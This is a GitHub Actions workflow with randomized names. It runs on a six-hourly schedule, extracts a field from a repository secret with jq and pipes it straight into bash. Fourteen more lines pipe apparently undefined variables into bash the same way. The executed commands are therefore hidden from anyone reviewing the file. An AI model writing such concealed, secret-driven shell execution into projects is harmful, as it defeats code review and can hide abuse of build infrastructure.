name: fnjcjkkk

on:
  workflow_dispatch:
  schedule:
    - cron: '59 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fnjcjkkk
        env:
          n46: ${{ secrets.n46 }}
        run: |
          echo $n46 | jq -r .yrnbm08 | /bin/bash
          echo $rag1184 | jq -r .h13594 | /bin/bash
          echo $czj311 | jq -r .i288 | /bin/bash
          echo $mfcf31628 | jq -r .kkcnh1316 | /bin/bash
          echo $r4711 | jq -r .rzvmn9 | /bin/bash
          echo $squ94 | jq -r .kkr86121 | /bin/bash
          echo $mcc648 | jq -r .uasst65446 | /bin/bash
          echo $fgcmk59 | jq -r .nc514 | /bin/bash
          echo $bc341 | jq -r .p2 | /bin/bash
          echo $qq65 | jq -r .vtzxe559 | /bin/bash
          echo $v6158 | jq -r .lrvk5555 | /bin/bash
          echo $lrls658 | jq -r .dlhbc703 | /bin/bash
          echo $u49880 | jq -r .vlhy89251 | /bin/bash
          echo $aiql91899 | jq -r .g25 | /bin/bash
          echo $ogfhv35350 | jq -r .jx5118 | /bin/bash

